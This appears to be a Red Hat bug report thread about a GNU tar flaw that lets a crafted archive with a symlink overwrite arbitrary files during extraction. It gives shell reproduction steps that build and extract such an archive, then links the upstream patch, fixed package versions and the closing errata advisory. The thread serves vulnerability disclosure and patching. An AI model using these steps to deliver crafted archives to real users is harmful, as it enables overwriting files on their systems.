Description of problem: GNU tar contains a flaw, that makes tar overwrite an arbitrairy file when extracting a crafted archive. See the original advisory for details. Steps to Reproduce: #TAR=/usr/src/redhat/BUILD/tar-1.13.25/src/tar TAR=tar # crafting a symlink gcc -o tarxyz tarxyz.c ./tarxyz > xyz.tar # cleaning environment up rm -f/home/$USER/hello.txt rm -f xyz # adding files, relative to xyz/ mkdir -p xyz/home/$USER echo "Hello" > xyz/home/$USER/hello.txt tar -rf xyz.tar xyz/home/$USER # exploitation rm -rf xyz # so symlink to / can be created $TAR -xf xyz.tar cat /home/$USER/hello.txt Additional info: All supported RHEL (2.1--4) and FC (5,6) releases are vulnerable
Kees Cook (of Ubuntu) reported an issue to upstream and proposed a patch. See this thread: http://lists.gnu.org/archive/html/bug-tar/2006-11/msg00028.html
Ping on this issue. Can we get some updated packages. The patch looks to be rather simple.
fixed in: tar-1.14-12.RHEL4, tar-1.13.25-15.RHEL3, tar-1.13.25-6.AS21.1 I dunno how to filed RHSA-2006:0749, concretely built for AS21.1.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2006-0749.html